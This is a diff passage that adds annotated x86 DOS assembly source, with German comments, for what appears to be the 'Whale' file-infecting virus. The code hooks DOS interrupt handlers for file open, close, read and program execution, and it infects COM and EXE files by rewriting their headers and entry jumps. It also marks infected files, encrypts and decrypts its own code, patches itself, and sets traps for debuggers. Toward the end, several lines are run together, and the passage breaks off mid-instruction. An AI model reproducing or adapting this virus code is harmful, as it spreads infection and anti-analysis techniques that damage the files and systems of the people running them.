+ DB 000h,0f4h,0a4h,033h,0c9h,0e8h
+;=====================================================================
+;============================( zum Handler fr Read Seq. FCB.AH=14)===
+;=====================================================================
+J02FF6: MDECODE 29
+ POP DX
+ POP DS
+ MOV SI,DX
+
+ PUSH CS
+ POP ES
+ MOV CX,0025h
+ MOV DI,Offset @FCB ; Kopiere FCB
+ REPZ MOVSB
+
+ MOV DI,Offset @FCB
+ PUSH CS
+ POP DS
+ MOV DX,[DI+12h] ; HOLE FILESIZE nach DX:AX
+ MOV AX,[DI+10h]
+ ADD AX,Code_Len+0FH ; ADD filesize, 240fh
+ ADC DX,+00h
+ AND AX,0FFF0h ; Filesize auf (mod 16) normieren
+ MOV [DI+12h],DX
+J03020: MOV [DI+10h],AX ; und zurueck
+ SUB AX,Code_Len-4 ; 23fc abziehen
+ SBB DX,+00h
+ MOV [DI+23h],DX ; und nach RandomRec kopieren ?!?
+ MOV [DI+21h],AX ; Dadurch wird das FILE in
+ ; einem Record gelesen ( aber nur,
+ ; wenn's kleiner als 1 Segment ist)
+
+ MOV CX,001Ch ; Lese 1Ch byte (EXE-Header)
+ MOV WORD Ptr DS:[DI+0Eh],0001h
+
+ MOV AH,27h ; READ RANDOM BLOCK FCB
+ MOV DX,DI
+ CALL CS:[@INT21]
+ MCODE 29
+ JMP J02EA3 ; fertig
+;=====================================================================
+;================================================( AUS DEM HIER : )===
+;=====================================================================
+J03047: DB 03BH,0DEH ; CMP BX,SI
+ DB 074H,0D5H ; JZ J03020
+ RETN
+;=====================================================================
+;===============================================( Wird DAS HIER : )===
+;=====================================================================
+ ;J03047:XOR WORD PTR CS:[SI],BX
+ ; NOP
+ ; RET
+;=====================================================================
+;============================================( DER CODE-PATCHER )===
+;============================================( SI kommt mit 210Ah )===
+;=====================================================================
+PATCH: PUSH BX
+
+ ADD SI,OFFSET J0492F-OFFSET J0491A
+ MOV BX,157Dh ; SI = 211F / 492F
+ CALL J03047
+
+ ADD SI,+02h ; SI = 2121 / 4931
+ MOV BX,758Bh
+ CALL J03047
+
+ ADD SI,+02h ; SI = 2123 / 4933
+ MOV BX,0081h
+ CALL J03047
+
+ ADD SI,+08h ; SI = 212B / 493B
+ MOV BX,0A08h
+ CALL J03047
+
+ ADD SI,+02h ; SI = 212D / 493D
+ MOV BX,302Fh
+ CALL J03047
+
+ ADD SI,+02h ; SI = 212f / 493F
+ MOV BX,02A5h
+ CALL J03047
+ ;----------------------( DECODE ist jetzt 'anders')---
+
+ ADD SI,OFFSET J0499D-OFFSET J04941+2
+ MOV BX,157Dh ; SI = 218D / 499D
+ CALL J03047
+
+ ADD SI,+05h ; SI = 2192 / 49A2
+ MOV BX,0A09Fh
+ CALL J03047
+
+ ADD SI,+0Ah ; SI = 219C / 49AC
+ MOV BX,00A7h
+ CALL J03047
+
+ ADD SI,+0Ch ; SI = 21A8 / 49B8
+ MOV BX,872Dh
+ CALL J03047
+
+ ADD SI,+02h ; SI = 21AA / 49BA
+ MOV BX,7829h
+ CALL J03047
+
+ ADD SI,+02h ; SI = 21AC / 49BC
+ MOV BX,4229h
+ CALL J03047
+
+ ADD SI,+02h ; SI = 21AE / 49BE
+ MOV BX,1AC0h
+ CALL J03047
+ ;---------------( CODEIT ist jetzt auch 'anders' )---
+
+ ADD SI,OFFSET J04A2A-OFFSET J049C0 + 2
+ ; SI = 221A / 4A2A
+ MOV BX,1114h
+ CALL J03047
+
+ ADD SI,OFFSET J04A39 - OFFSET J04A2A
+ ; SI = 2229 / 4A39
+ MOV BX,0000h ; ? NOP ?
+ CALL J03047
+
+ ADD SI,OFFSET J04A44 - OFFSET J04A39
+ ; SI = 2234 / 4A44
+ MOV BX,02E3h
+ CALL J03047
+
+ POP BX
+ RETN
+;=====================================================================
+;=================================( Handler fr GET FILESIZE /FCB )===
+;=====================================================================
+J030DF: MDECODE 30
+ PUSH CS
+ POP ES
+ MOV DI,Offset @FCB
+ MOV CX,0025h ; Kopiere FCB
+ MOV SI,DX
+ REPZ MOVSB
+
+ PUSH DS
+ PUSH DX
+ PUSH CS
+ POP DS
+
+ MOV AH,0Fh ; OPEN FCB
+ MOV DX,Offset @FCB ; FCB steht an DS:DX
+ CALL CS:[@INT21]
+ MOV AH,10h ; CLOSE FCB !
+ CALL CS:[@INT21]
+ TEST BYTE Ptr DS:[@FCB+17H],80h
+ POP SI
+ POP DS
+ MCODE 30
+
+ JZ J03182
+
+ LES BX,DWord ptr CS:[@FCB+010h] ; File-Size
+
+J03117: MDECODE 31
+ MOV AX,ES
+ SUB BX,Code_len
+ SBB AX,0000h
+ XOR DX,DX
+ MOV CX,WORD PTR CS:[@FCB+0eh] ; Rec-Size
+ DEC CX
+ ADD BX,CX
+ ADC AX,0000h
+ INC CX
+ DIV CX
+ MOV [SI+23h],AX
+ XCHG AX,DX ;
+ XCHG AX,BX
+ DIV CX
+ MOV [SI+21h],AX
+ MCODE 31
+ JMP J02EA3 ; fertig
+;=====================================================================
+;=======================================( setzt INT 02 auf "IRET" )===
+;=====================================================================
+StopINT_02: MDECODE 32
+ CALL PushALL
+ IN AL,21h
+ OR AL,02h ; setze Bit 2
+ OUT 21h,AL
+
+ MOV AL,02h
+ CALL GetInt_AL ; GET INT 02
+ ; ergebnis in ES:BX
+ MOV AX,CS ; AX = CS
+ MOV CX,ES
+ CMP AX,CX
+ JZ J03179
+ MOV WORD PTR CS:[@INT02+2],ES
+ MOV WORD PTR CS:[@INT02 ],BX
+
+ PUSH CS
+ POP DS
+ CALL J03170
+J03170: POP DX ; GET IP
+ ADD DX,OFFSET INT_02-OFFSET J03170
+
+ MOV AL,02h
+ CALL SetInt_AL ; SET INT 02 auf IRET
+
+J03179: CALL PopALL
+ MCODE 32
+ RETN
+;=====================================================================
+INT_02: IRET ; KOPROZESSORFEHLER + MEMORY PARITY-FEHLER
+;=====================================================================
+J03182: JMP J02B8B ; CALL LOW_INT_21
+ DB 0E8h
+;=====================================================================
+;=======================================( SET INT 02 zum Original )===
+;=====================================================================
+Re_SET_Int_02: MDECODE 33
+ CALL PushALL
+
+ IN AL,21h
+ AND AL,0FDh ; lsche Bit 2
+ OUT 21h,AL
+
+ LDS DX,CS:[@INT02] ; OLD INT 02
+ MOV AL,02h
+ CALL SetInt_AL ; SET INT 02
+ CALL PopALL
+ MCODE 33
+ RETN
+;=====================================================================
+;================================( Handler fr Open File / Handle )===
+;=====================================================================
+J031A6: CALL GET_Current_PSP
+ CALL J039C3 ; ist die Datei ausfhrbar ?
+ JB J031F1 ; nein....
+ CMP BYTE PTR CS:[D24A2],00h ; hab ich schon infiziert
+ JZ J031F1
+ CALL J043B1 ; Vorarbeiten
+ CMP BX,0ffffh ; Fehler bei Vorarbeiten ??
+ JZ J031F1 ; oder garkeine DATEI ??
+;===========================================()==========================
+ MDECODE 34
+ DEC BYTE PTR CS:[D24A2]
+ PUSH CS
+ POP ES
+
+ MOV CX,0014h
+ MOV DI,Offset D2452 ; ja ? wenn ich's wsst...
+ XOR AX,AX
+ REPNZ SCASW
+
+ MOV AX,CS:[@PSP]
+ MOV ES:[DI-02h],AX
+ MOV ES:[DI+26h],BX
+ MOV [BP-04h],BX
+ MCODE 34
+
+J031E7: AND BYTE PTR CS:[D24B3],0FEh ; CF lschen
+ JMP J02EA3 ; fertig
+
+ DB 0E8h
+
+J031F1: JMP J02B8B ; CALL LOW_INT_21
+;=====================================================================
+;===============================( Handler fr CLOSE FILE / Handle )===
+;=====================================================================
+J031F4: MDECODE 35
+ PUSH CS
+ POP ES
+ CALL GET_Current_PSP
+ MOV CX,0014h
+ MOV AX,CS:[@PSP]
+ MOV DI,Offset D2452
+ MCODE 35
+
+J0320C: REPNZ SCASW
+J0320E: JNZ J03227
+ CMP BX,ES:[DI+26h]
+ JNZ J0320C
+ MOV WORD PTR ES:[DI-02h],0000h
+ CALL J03642 ; infizieren !
+ INC BYTE PTR CS:[D24A2]
+ JMP J031E7
+ ;================================
+ DB 0BBh
+ ;================================
+J03227: JMP J02B8B ; Call LOW-INT-21
+ ;================================
+ DB 3DH
+ ;================================
+;=====================================================================
+;=============================================( Hole aktuelle DTA )===
+;=====================================================================
+GetDTA: MDECODE 36
+ MOV AH,2FH ; GET DTA
+ PUSH ES
+ CALL CS:[@INT21]
+ PUSH ES
+ POP DS
+ POP ES
+ MCODE 36
+ RETN
+;---------------------------------------------------------------------
+J03240: DB 0E9H,012H,003H ; JMP J03555 == NIRWANA !
+;=====================================================================
+;=====================================( versteckter DECODE-Aufruf )===
+;=====================================================================
+Decode: JMP J0491B ; CMP AX,16D5H
+;-----------------------------------------------------------(trash)---
+ JZ J03240
+ SUB AX,12EFh
+ DEC SI
+ INC BH
+ JMP J02FEA
+;=====================================================================
+;=====(-----------------------------------------------------------)===
+;=====( Affengeiler Code )===
+;=====(-----------------------------------------------------------)===
+;=====( SP sichern in BP )===
+;=====( "C353" auf den Stack, wobei SS=CS & C353 = "PUSH BX, RET" )===
+;=====( Dann ein CALL dessen RET-Adresse vom Stack geholt wird. )===
+;=====( Dafr wird DX alias BP auf den Stack gelegt. Kuckuck ! )===
+;=====( Schliesslich wird nach SS:SP-2, also "PUSH BX, RET", )===
+;=====( gesprungen, also ein "RET" zur Adresse J034D4 ausgefhrt )===
+;=====(-----------------------------------------------------------)===
+;=====( Kein Wunder, da der Wal nach Fischen sucht ;-))) )===
+;=====================================================================
+J03251: MOV DX,BP ; DX = BP
+ MOV BP,SP
+ MOV BX,0C353H
+ PUSH BX
+J03259: CALL J0341A ; ursprnglich "INT 3"
+J0325C DB 0BBH
+;----------------------------------------------------------( Info )---
+; J0341A: POP BX ; BX = 325C
+; ADD BX,OFFSET J034D4-Offset J0325C
+; PUSH DX ;
+; SUB BP,+02h ; BP = SP-2
+; DB 36H ; hat noch gefehlt :-)
+; JMP BP ; = JMP DX / JMP 34D4
+;--------------------------( => )------
+; SS:SP-2 PUSH BX ; = 53h
+; SS:SP-1 RET ; = C3h
+;=====================================================================
+;==============================================( Handler fr EXEC )===
+;=====================================================================
+J0325D: OR AL,AL ; Ist AL = 0 ( = Load + execute ) ?
+ JZ J03264 ; JA !!
+ JMP J034FC
+;=====================================================================
+;================================================( EXEC AX = 4B00 )===
+;=====================================================================
+J03264: MDECODE 37
+ PUSH DS
+ PUSH DX
+ MOV Word ptr CS:[D2424+2],ES ; Adress of EPB
+ MOV Word ptr CS:[D2424 ],BX
+ LDS SI,DWord ptr CS:[D2424]
+
+ MOV CX,000Eh ; kopiere epb in ds
+ MOV DI,Offset EPB
+ PUSH CS
+ POP ES
+ REPZ MOVSB
+
+ POP SI
+ POP DS
+ MOV CX,0050h ; kopiere kommandozeile
+ MOV DI,Offset Cmd_Line
+ REPZ MOVSB
+
+ MOV BX,0FFFFh ; wird wieder zerstrt
+ CALL PopALL
+ POP BP ; Original-BP
+ POP CS:[D24E6] ; CALLERs IP
+ POP CS:[D24E8] ; CALLERS CS
+ POP CS:[D24B3] ; CALLERS Flags
+ PUSH CS
+
+ MOV AX,4B01h ; Load, but do not execute
+ POP ES ; Segment EPB
+ PUSHF
+ MOV BX,Offset EPB ; Offset EPB
+ CALL CS:[Low_INT_21H]
+
+ MCODE 37
+
+ JNB J032DA ; JMP if kein Fehler
+
+ OR WORD PTR CS:[D24B3],+01h; sonst CF setzen
+ PUSH CS:[D24B3] ; Flags
+ PUSH CS:[D24E8] ; CS
+ PUSH CS:[D24E6] ; IP
+ PUSH BP
+ LES BX,DWord ptr CS:[D2424] ; Alten EPB zurck
+ MOV BP,SP ; Alten SP
+ JMP IRET_Int21h ; und fertig
+;======================================================
+ DB 89h,04h
+;=======================================( kein Fehler aufgetreten )===
+J032DA: MDECODE 38
+ CALL GET_Current_PSP
+ PUSH CS
+ POP ES
+ MOV CX,0014h
+ MOV DI,Offset D2452
+J032EA: MOV AX,CS:[@PSP]
+ REPNZ SCASW
+ JNZ J032FF
+ MOV WORD PTR ES:[DI-02h],0000h
+ INC BYTE PTR CS:[D24A2]
+ JMP J032EA
+;====================================================================
+J032FF: MCODE 38
+ LDS SI,DWORD PTR CS:[D2503] ; Ist IP-Init = 1 ( WAL ! )
+ CMP SI,+01h
+ JNZ J0334D ; nein. Dann infizieren
+ ; sonst wal ausblenden
+ MDECODE 39
+ MOV DX,Word Ptr DS:[001Ah]
+ ADD DX,+10h
+
+ MOV AH,51h
+ CALL CS:[@INT21]
+
+ ADD DX,BX
+ MOV Word Ptr CS:[D2505],DX
+ PUSH Word Ptr DS:[0018h]
+ POP Word Ptr CS:[D2503]
+
+ ADD BX,Word Ptr DS:[0012h]
+ ADD BX,+10h
+ MOV Word Ptr CS:[D2501],BX
+
+ PUSH Word Ptr DS:[0014h]
+ POP Word Ptr CS:[D24FF]
+
+ MCODE 39
+ JMP J0345F
+;---------------------------------------------------------------------
+ DB 09h
+;---------------------------------------------------------------------
+J0334D: JMP J03428 ; jmp zut Infect-routine
+;=====================================================================
+;===================================================( Selbst-Test )===
+;=====================================================================
+J03350: MDECODE 40
+ CALL PushALL
+ JMP J03362
+
+J0335B: XOR AL,CS:[BX]
+ INC BX
+ LOOP J0335B
+ RETN
+;-----------------------------------( netterweise werden hier die )---
+;-----------------------------------( 'echten' Labels publik ! )---
+J03362: XOR AL,AL
+ MOV BX,0021h ; 2831..2852 ; ENTRY...2852
+ MOV CX,007Ah
+ CALL J0335B
+ MOV BX,0173h ; 2983..298d ; init SI
+ MOV CX,000Ah
+ CALL J0335B
+ MOV BX,0253h ; 2a63..2a7f ; trace...
+ MOV CX,001Ch
+ CALL J0335B
+ MOV BX,0550h ; 2d60..2d6a ; ?????????????
+ MOV CX,000Ah
+ CALL J0335B
+ MOV BX,0705h ; 2f15..2f55
+ MOV CX,0040h
+ CALL J0335B
+ MOV BX,0790h ; 2fa0..2ff6
+ MOV CX,0056h
+ CALL J0335B
+ MOV BX,0A30h ; 3240..3264
+ MOV CX,0024h
+ CALL J0335B
+ MOV BX,0C0Ah ; 341a..3428
+ MOV CX,000Eh
+ CALL J0335B
+ MOV BX,0CC4h ; 34d4..3510
+ MOV CX,003Ch
+ CALL J0335B
+ MOV BX,105Ah ; 386a..3897
+ MOV CX,002Dh
+ CALL J0335B
+ MOV BX,1106h ; 3916..393f
+ MOV CX,0029h
+ CALL J0335B
+ MOV BX,210Ah ; 491a..4981
+ MOV CX,0067h
+ CALL J0335B
+ MOV BX,2173h ; 4983..4a56
+ MOV CX,00D8h
+ CALL J0335B
+ MOV BX,236Ch ; 4b7c..4bb5
+ MOV CX,0039h
+ CALL J0335B
+ MOV BX,1D7Dh ; 458d..45b2
+ MOV CX,0025h
+ CALL J0335B
+ MOV BX,1C7Ch ; 448c..44ce
+ MOV CX,0042h
+ CALL J0335B
+ CMP AL,0E0h ; sic !!
+ JZ J03412
+ ;-----------------------------------------------------
+ MOV WORD PTR CS:[D2598],0F4F4h ; = HLT
+ MOV BX,OFFSET D2598
+ PUSHF
+ PUSH CS
+ PUSH BX
+ XOR AX,AX
+ MOV DS,AX
+ MOV WORD PTR DS:[0006h],0FFFFh ; SEGMENT Int 01
+ CALL Debugger_Check ; STOP
+ ;-----------------------------------------------------
+J03412: CALL PopALL
+ MCODE 40
+J03419: RETN
+;====================================================( JMP J034D4 )===
+J0341A: POP BX ; BX = 325C
+ ADD BX,OFFSET J034D4-Offset J0325C ; BX = 34D4
+ PUSH DX ;
+ SUB BP,+02h ; BP = SP
+ ;****************************************************
+ DB 36H ; Seg-Prefix hat noch gefehlt
+ ;****************************************************
+ JMP BP ; -> JMP DX -> JMP BX
+;---------------------------------------------------------------------
+ DB 0E9h,0DBh,000
+;-------------------------------( Nochmal Kontrolle, ob infiziert )---
+J03428: MDECODE 41
+ MOV AX,[SI]
+ ADD AX,[SI+02h]
+ PUSH BX
+ MOV BX,[SI+04h]
+
+ XOR BX,5348h ; 'SH'
+ XOR BX,4649h ; 'FI'
+
+ ADD AX,BX
+ POP BX
+ MCODE 41
+ JZ J034AF ; ist schon infiziert
+ PUSH CS
+ POP DS
+ MOV DX,Offset Cmd_Line
+ CALL J039C3 ; ist die Datei ausfhrbar ?
+ CALL J043B1 ; Vorarbeiten
+ INC BYTE PTR CS:[D24EF]
+ CALL J03642 ; infizieren
+ DEC BYTE PTR CS:[D24EF]
+;=====================================================================
+;===================================( Datei im RAM wird gestartet )===
+;=====================================================================
+J0345F: MDECODE 42
+
+ MOV AH,51h ; GET current PSP
+ CALL CS:[@INT21]
+
+ CALL SaveRegisters
+ CALL Patch_IBMDOS
+ CALL GetRegsFromVirstack
+ MOV DS,BX
+ MOV ES,BX
+ PUSH WORD PTR CS:[D24B3] ; CALLERs FLAGS
+ PUSH WORD PTR CS:[D24E8] ; Caller-CS
+ PUSH WORD PTR CS:[D24E6] ; Caller-IP
+ POP Word Ptr DS:[000Ah]
+ POP Word Ptr DS:[000Ch]
+ PUSH DS
+ MOV AL,22h
+ LDS DX,Dword Ptr DS:[000Ah]
+ CALL SetInt_AL ; SET INT 22 TO CALLER
+ POP DS
+ POPF ; POP Original-Flags
+ POP AX ; POP RET-Adresse
+ MOV SP,CS:[D24FF] ; SP-INIT
+ MOV SS,CS:[D2501] ; SS-INIT
+ MCODE 42
+ JMP DWORD PTR CS:[D2503] ; EXEC Programm
+;=====================================================================
+;==============( Datei ist infiziert. Wal desinfiziert sie im RAM )===
+;=====================================================================
+; Offset 100H JMP 4BCC = E9 C9 4A
+; Offset 2814 EXE_ID E9 pq rs , Savebytes
+; Offset 4BCC Vir-Entry
+; 2814-4AC9-100h = DC4B usw.
+;=====================================================================
+J034AF: MDECODE 43 ; SI zeigt auf COM-START
+ MOV BX,[SI+01h] ; Sprungziel nach BX
+ MOV AX,[BX+SI+0DC4Bh] ; -23B5, Diff -3 zw.
+ MOV [SI],AX ; Savebytes und 4BCC
+ MOV AX,[BX+SI+0DC4Dh] ; -23B3
+ MOV [SI+02h],AX
+ MOV AX,[BX+SI+0DC4Fh] ; -2361
+ MOV [SI+04h],AX
+ CALL J045D0 ; 'aktiv-msg'
+ MCODE 43
+ JMP J0345F ;
+;=====================================================================
+;================================( EINTRITT IN "ARBEITSPHASE" )===
+;================================( Durch die erste Anweisung wird )===
+;================================( der JMP zum Relokator erzeugt )===
+;=====================================================================
+J034D4: MOV BYTE PTR CS:[SI+SwapCode_2],0E9h
+ ; JMP bei 3A20 erzeugen !!
+ POP BP ; BP = 20h
+ MOV CX,0004h ; Das nchste RET macht wieder
+ ; "PUSH BX,RET"
+ MOV BX,DS ; BX = DS
+ OR BX,BP ; BX = DS or 20h
+ MOV DS,BX ; DS = DS or 20H
+
+J034E4: SHL BX,1 ; BX = BX * 16
+ LOOP J034E4
+
+ MOV AX,CX ; AX = 0
+ MOV CX,001Ch ; CX = 1C
+
+J034ED: ADD AH,[BX]
+ INC BX
+ LOOP J034ED
+
+ PUSH AX ; AX auf den Stack
+
+ MOV CX,[BX]
+ PUSH CS
+ POP AX
+ SHR BH,1
+ JMP J03919
+;=====================================================================
+;================================================( Gehrt zu EXEC )===
+;=====================================================================
+J034FC: CMP AL,01h ; AX = 4B01 ( durch Debugger und Wal )
+ JZ J03510 ; ja , durch Debugger und Wal.
+ JMP J02B8B ; nein, AX=4B03. Low-int-21h rufen
+;=====================================================================
+;===========================================================(trash)===
+;=====================================================================
+J03503: DB 01,0cbh,81h,0fbh,34h,28h,72h,0f8h,81h,0f1h,21h,21h,0a1h
+ ;---------------------------------------
+ ;J03503:ADD BX,CX
+ ; CMP BX,2834h ; OFFSET VIR_NAME
+ ; JB J03503
+ ; XOR CX,2121h ; "!!"
+ ; MOV AX,WORD PTR DS:[30E8h]
+ ; STD
+ ; SUB [BX+SI],AL
+ ;---------------------------------------
+;=====================================================================
+;==============================================( EXEC mit 4B01h )===
+;==============================================( Aufruf durch WAL )===
+;==============================================( und Debugger )===
+;=====================================================================
+J03510: MDECODE 44
+ OR WORD PTR CS:[D24B3 ],+01h ; CALLERS Flags
+ MOV Word ptr CS:[D2424+2],ES ; EPB sichern
+ MOV Word ptr CS:[D2424 ],BX
+ CALL PopALL
+ CALL CS:[@INT21] ; int 21h rufen
+ CALL PushALL
+ LES BX,DWord ptr CS:[D2424] ; EPB zurck
+ LDS SI,DWord ptr ES:[BX+12h] ; CS:IP holen
+ MCODE 44
+ JNB J03542 ; ---> Infektion
+ JMP J035E0 ; ---> fertig
+;=========================================================()========
+J03542: AND BYTE PTR CS:[D24B3],0FEh; CF lschen
+ CMP SI,+01h ; ist IP-INIT=1 (infiziert)
+ JZ J0358E
+ MDECODE 45
+ MOV AX,[SI]
+ ADD AX,[SI+02h]
+ PUSH BX
+ MOV BX,[SI+04h]
+ XOR BX,5348h ; "SH"
+ XOR BX,4649h ; "FI"
+ ADD AX,BX
+ POP BX
+ MCODE 45
+ JNZ J035C3 ; nicht markierbar, keine Infektion
+ ;---------------------( Dateianfang manipulieren )---
+ MDECODE 46
+ MOV BX,[SI+01h]
+ MOV AX,[BX+SI+0DC4Bh] ; SIEHE 34af!
+ MOV [SI],AX
+ MOV AX,[BX+SI+0DC4Dh]
+ MOV [SI+02h],AX
+ MOV AX,[BX+SI+0DC4Fh]
+ MOV [SI+04h],AX
+ MCODE 46
+ JMP SHORT J035C3 ; Terminate-Adresse festlegen
+
+;=====================================================================
+;=====================================( Datei ist schon infiziert )===
+;=====================================================================
+J0358E: MDECODE 47 ; ES:BX = EPB
+ MOV DX,WORD PTR DS:[001Ah] ; DS:SI = CS:IP der Datei
+ CALL GET_Current_PSP
+
+ MOV CX,CS:[@PSP]
+ ADD CX,+10h
+ ADD DX,CX
+ MOV ES:[BX+14h],DX
+
+ MOV AX,Word Ptr DS:[0018h]
+ MOV ES:[BX+12h],AX
+
+ MOV AX,Word Ptr DS:[0012h]
+ ADD AX,CX
+ MOV ES:[BX+10h],AX
+
+ MOV AX,Word Ptr DS:[0014h]
+ MOV ES:[BX+0Eh],AX
+ MCODE 47
+;=====================================================================
+;==============================( Installation des INT 22-Handlers )===
+;=====================================================================
+J035C3: MDECODE 48
+ CALL GET_Current_PSP
+ MOV DS,CS:[@PSP]
+ MOV AX,[BP+02h]
+ MOV Word Ptr DS:[000Ah],AX ; OFFSET int 22-Handler
+ MOV AX,[BP+04h]
+ MOV Word Ptr DS:[000Ch],AX ; Segment int 22-Handler
+ MCODE 48
+J035E0: JMP J02EA3 ; Fertig
+;=====================================================================
+;====================================( kann ja fast nicht sein ...)===
+;=====================================================================
+; erzeugt wird :
+; DB 01h
+; DW CS
+; DW SS
+; DW SP
+;--------------------------------------------------------------------
+J035E3: MOV WORD PTR CS:[023Ah],CS ;2a4a
+ MOV WORD PTR CS:[023Ch],SS ;2a4c
+ MOV WORD PTR CS:[023Eh],SP ;2a4e
+ MOV BYTE PTR CS:[0239h],01h ;2a49
+ PUSH DS
+ POP AX ; ist auch bloss Mll !
+;===================================================================== +;=================================( Kontrolle des Verfalls-Datums )=== +;===================================================================== +Check_Verfallsdatum: + MDECODE 49 + CALL PushALL + MOV AH,2Ah ; GET System Time & Date + CALL CS:[@INT21] ; + CMP CX,07C8h ; 1992 + JNB J0361A ; CX >= 1992 : Setze [Error],1 + CMP CX,07C7h ; 1991 + JNZ J03620 ; CX <> 1991 : Lasse [Error] + CMP DH,04h ; April + JB J03620 ; DH < APRIL : Lasse [Error] + ;----------------------------------------------------- +J0361A: MOV BYTE PTR CS:[Error],01h +J03620: CMP BYTE PTR CS:[Error],00h + JZ J0362F + CALL PopALL + POP AX + JMP J03632 + ;-------------- +J0362F: CALL PopALL +J03632: MCODE 49 + CMP BYTE PTR CS:[Error],00h + JZ J03641 + JMP J03761 ; Returnadresse bleibt auf Stack... +J03641: RETN +;===================================================================== +;==================================( "JMP Decode_Whale" schreiben )=== +;===================================================================== +J03642: MDECODE 50 + ;------------------------------------------------------- + MOV BYTE PTR CS:[0001h],0E9h ; JMP 23BC /4BCC + MOV BYTE PTR CS:[0002h],0B8h ; CS:0001=CS:2811 + MOV BYTE PTR CS:[0003h],023h + ;-------------------------------------------------- + CALL Trace_int_13h + + CALL J0378C ; errechnet unter anderem Paras fr File + ; SI = bentigte Paragrafen + ; CX = 10h + ; DX:AX = Filesize gerundet + ; auf nchsten Paragrafen + + MOV BYTE Ptr DS:[OFFSET EXE_FLAG-Offset VirStart],01h + CMP WORD Ptr DS:[CodBuf],'MZ' + MCODE 50 + JZ J0367E + DEC BYTE Ptr DS:[Offset Exe_Flag-Offset VirStart] + + JZ J036F9 ; Wenn EXE-FLAG "1" war, + ; also immer (!) 
+;===================================================================== +;=========================================( EXE-Header auswerten )=== +;=========================================( Infektion vorbereiten )=== +;=====================( die Berechnung scheint fehlerhaft zu sein )=== +;===================================================================== +J0367E: MDECODE 51 + MOV AX,WORD PTR DS:[CodBuf+4] ; Pages + SHL CX,1 ; CX = 20h + MUL CX ; AX ist ((Lnge-1) div 200h)*20h + ; Also jetzt : (Lnge-1) DIV 10H + ; AX enthlt die bentigte Anzahl + ; Paragrafen, um EXE zu laden. + ADD AX,0200h ; AX=AX+200h, gibt keinen Sinn + CMP AX,SI ; Vergleiche AX mit Max-Paras + MCODE 51 + JB J036F6 ; jmp, wenn AX kleiner ist + + MOV AX,WORD PTR DS:[CodBuf+0Ah] ; MinFree + OR AX,WORD PTR DS:[CodBuf+0Ch] ; MaxFree + JZ J036F6 + MDECODE 52 + MOV DX,Word ptr DS:[FileSize+2] + MOV CX,0200h + MOV AX,Word ptr DS:[FileSize ] + DIV CX ; AX = (DX:AX) / 512; -> Pages + OR DX,DX ; Blieb ein Rest ??? + MCODE 52 + JZ J036B8 ; ja.. + INC AX +J036B8: MOV WORD PTR DS:[CodBuf+2 ],DX ; Lnge LastPage + MOV WORD PTR DS:[CodBuf+4 ],AX ; Anzahl Pages + CMP WORD PTR DS:[CodBuf+14h],+01h ; IP-Init = 1? + JNZ J036CA ; ( Whale !) + JMP J03761 ; dann fertig ! +;-------------------------------------------------------------------- + DB 0E8h +;-------------------------------------------------------------------- +J036CA: CALL Check_Verfallsdatum + MDECODE 53 + MOV WORD PTR DS:[CodBuf+14h],0001h + ; IP-INIT = 0001h + MOV AX,SI ; MaxParas -> AX + SUB AX,WORD PTR DS:[CodBuf+8] ; AX=AX-Headerparas + MOV WORD PTR DS:[CodBuf+16h ],AX ; CS-INIT <-AX !!!! + ADD WORD PTR DS:[CodBuf+4 ],+12h ; 12 Pages dazu + ; (== Whale-Size ) + ;----------------------------------------------------------- + ; eine andere Art, ein Virus zu entdecken : + ; Wenn ein EXE wie ein COM initialisiert wird... 
+ ;----------------------------------------------------------- + MOV WORD PTR DS:[CodBuf+010h],0FFFEh; SP-Init = COM-LIKE + MOV WORD PTR DS:[CodBuf+ 0Eh],AX ; SS-Init = CS-Init + MCODE 53 + CALL Infect_File +J036F6: JMP J03761 +;===================================================================== +;=======================================( Verfahren fr COM-Files )=== +;===================================================================== +J036F9: CMP SI,0F00h ; COM-Size > 61440 Byte ?!? + JNB J03761 ; Dann geht es eben nicht ... + + ;--------------( merken der ersten 6 Byte des COM )--- + MDECODE 54 + MOV AX,WORD PTR DS:[CodBuf ] ; whale: + MOV WORD PTR DS:[0004h],AX ; AX = 20CC + ADD DX,AX ; DX = 0, da COM + MOV AX,WORD PTR DS:[CodBuf+2] + MOV WORD PTR DS:[0006h],AX ; AX = 0 + ADD DX,AX ; DX = 20CC + MOV AX,WORD PTR DS:[CodBuf+4] ; AX = 0 + MOV WORD PTR DS:[0008h],AX + + XOR AX,5348h ; 'SH' !! ; AX = 5348 + XOR AX,4649h ; 'FI' !! ; AX = 1501 + + ADD DX,AX ; DX = 35CD + MCODE 54 + JZ J03761 ; DX = 0 -> Keine Infektion , + ; File kann nicht markiert werden. + + MOV AX,WORD PTR DS:[D24F2] ; Hole Fileattribut + AND AL,04h ; Ist es SYSTEM ? + JNZ J03761 ; jmp, wenn ja + CALL Check_Verfallsdatum + + MDECODE 55 + ;---------------------( JMP am COM-Start erzeugen )--- + MOV CL,0E9h + MOV AX,0010h + MOV BYTE PTR DS:[CodBuf],CL + MUL SI ; AX = COM-Lnge in Byte, + ; auf ganzen Paragrafen + ; gerundet + ADD AX,23B9h ; So weit also + 3 Byte + ; zum De-Cryptor + MOV WORD PTR DS:[CodBuf+1],AX; hier also "JMP J04BCC" + ;---------------------------------------------------- + ;-----------------( File als infiziert markieren )--- + ;---------------------------------------------------- + MOV AX,WORD PTR DS:[CodBuf ]; AX = C9E9 + ADD AX,WORD PTR DS:[CodBuf+2]; AX = C9E9+004A =CA33 + NEG AX ; AX = - AX = 35CD + + XOR AX,4649h ; 'FI' !! ; AX = 7384 + XOR AX,5348h ; 'SH' !! ; AX = 20CC (!!) 
+ + MOV WORD PTR DS:[CodBuf+4],AX; Siehe Label "start" + MCODE 55 + CALL Infect_File +;--------------------------------------( Ende der Infektionsphase )--- +J03761: MDECODE 56 + + MOV AH,3Eh ; CLOSE FILE + CALL CS:[@INT21] + + MOV CX,CS:[D24F2] + MOV AX,4301h ; Change File-Attribut + MOV DX,CS:[D24F4] ; Offset Filename + MOV DS,CS:[D24F6] ; Segment Filename + + CALL CS:[@INT21] + CALL J048CD ; RESET Int 13h und Int 24h + MCODE 56 ; Alles ist so wie vorher... + RETN +;===================================================================== +;====================================( Vorbereitung fr Infektion )=== +;===================================================================== +J0378C: MDECODE 57 + PUSH CS + MOV AX,5700h ; Get File-date + POP DS + CALL CS:[@INT21] + + MOV WORD PTR DS:[FileTime],CX ; Uhrzeit + + MOV AX,4200h ; SEEK Fileanfang + MOV Word Ptr DS:[FileDate],DX + XOR CX,CX + XOR DX,DX + CALL CS:[@INT21] + + MOV AH,3Fh ; Read file + MOV DX,OFFSET CodBuf ; nach DS:DX + MOV CL,1Ch ; 1C byte ( EXE-Header ! 